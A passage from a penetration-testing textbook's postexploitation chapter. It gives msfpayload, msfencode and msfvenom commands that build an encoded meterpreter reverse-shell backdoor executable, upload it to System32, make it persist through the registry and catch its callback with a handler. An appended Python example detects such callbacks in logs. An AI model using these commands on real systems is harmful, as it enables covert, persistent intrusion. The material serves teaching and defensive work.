246 ◾ Ethical Hacking and Penetration Testing Guide
We can use msfencode together with msfpayload in a single pipeline by issuing the following command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.144 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/backdoor.exe
The -e parameter specifies the encoder to use, in this case shikata_ga_nai; the -t parameter defines the output format, in this case exe.
By default, msfencode applies a single iteration of the encoder; to apply more iterations, specify the -i parameter followed by the number of iterations.
MSFVenom
Msfvenom combines msfpayload and msfencode, which makes it easier for us to generate a payload and encode it at the same time. We can view the options by typing the following command:
msfvenom -h
Postexploitation ◾ 247
To generate an encoded executable, we will use the following command:
root@bt:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.75.144 LPORT=4444 -f exe > /root/Desktop/backdoor.exe
We can see that our backdoor succeeded with five iterations. Now it's time to upload our backdoor to the target machine and make it persistent just like we did with netcat. We use the same commands to accomplish our goal.
Command:
upload /root/Desktop/backdoor.exe C:\\Windows\\System32
Next we make our backdoor persistent by making changes to the registry. Once our registry value has been set, as soon as Windows reboots, our backdoor starts making connections to the LHOST we provided. So in order to receive the connection, we need to set up a handler.
We can set up a handler by issuing the following command from the Metasploit console:
use exploit/multi/handler
Next we need to define LHOST and LPORT, which we defined while we created the backdoor.
As soon as Windows reboots, a meterpreter session will be opened again:
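The behaviour just described (a machine that, right after every reboot, repeatedly tries to connect back to one fixed IP and port such as 4444) is also what a defender looks for in firewall or flow logs. The following is an added example, not code from the book or from Metasploit: it runs a simple beaconing check over a few constructed log lines. The log format, the source address 192.168.75.150 and the EXPECTED_PORTS allow-list are assumptions; only the LHOST 192.168.75.144 and port 4444 come from the text above.

```python
"""
Added example (not from the book): flag hosts whose outbound traffic looks like
the reverse_tcp callback described above, i.e. one internal host repeatedly
connecting to a single IP:port on an unusual port shortly after boot.
The log lines are constructed; the field layout is a hypothetical firewall
export, not any particular vendor's format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ports a workstation is normally expected to talk to (assumed allow-list);
# connections to anything else are treated as unusual.
EXPECTED_PORTS = {53, 80, 88, 389, 443, 445, 636}

# Constructed sample log: "timestamp src_ip dst_ip dst_port action".
# 192.168.75.150 is a made-up victim; 192.168.75.144:4444 is the LHOST/LPORT
# used in the text.
SAMPLE_LOG = """\
2014-03-01T08:00:02 192.168.75.150 192.168.75.144 4444 SYN
2014-03-01T08:00:07 192.168.75.150 192.168.75.144 4444 SYN
2014-03-01T08:00:12 192.168.75.150 192.168.75.144 4444 SYN
2014-03-01T08:00:15 192.168.75.150 192.168.75.1 53 SYN
2014-03-01T08:00:20 192.168.75.151 93.184.216.34 443 SYN
2014-03-01T08:30:00 192.168.75.151 93.184.216.34 443 SYN
"""


def parse_line(line):
    """Split one log line into (timestamp, src, dst, port, action)."""
    ts, src, dst, port, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), action


def find_callbacks(log_text, min_attempts=3, window=timedelta(minutes=5)):
    """Return [(src, dst, port, total_attempts)] for every src->dst:port pair
    that made at least `min_attempts` connection attempts to a port outside
    EXPECTED_PORTS within any `window`-long span."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, action = parse_line(line)
        if action != "SYN" or port in EXPECTED_PORTS:
            continue
        attempts[(src, dst, port)].append(ts)

    findings = []
    for (src, dst, port), times in attempts.items():
        times.sort()
        start = 0
        # Sliding window over the sorted timestamps: report the pair as soon as
        # `min_attempts` attempts fall inside one window.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= min_attempts:
                findings.append((src, dst, port, len(times)))
                break
    return findings


if __name__ == "__main__":
    for src, dst, port, n in find_callbacks(SAMPLE_LOG):
        print(f"possible reverse-shell callback: {src} -> {dst}:{port} ({n} attempts)")
```

Run against the constructed log, only the 192.168.75.150 to 192.168.75.144:4444 pair is reported; the DNS lookup and the two HTTPS connections are ignored because their ports are on the allow-list. In practice the allow-list and thresholds are tuned per environment, and the same check becomes far more useful when correlated with host boot events, since the text above shows the callback fires on every reboot.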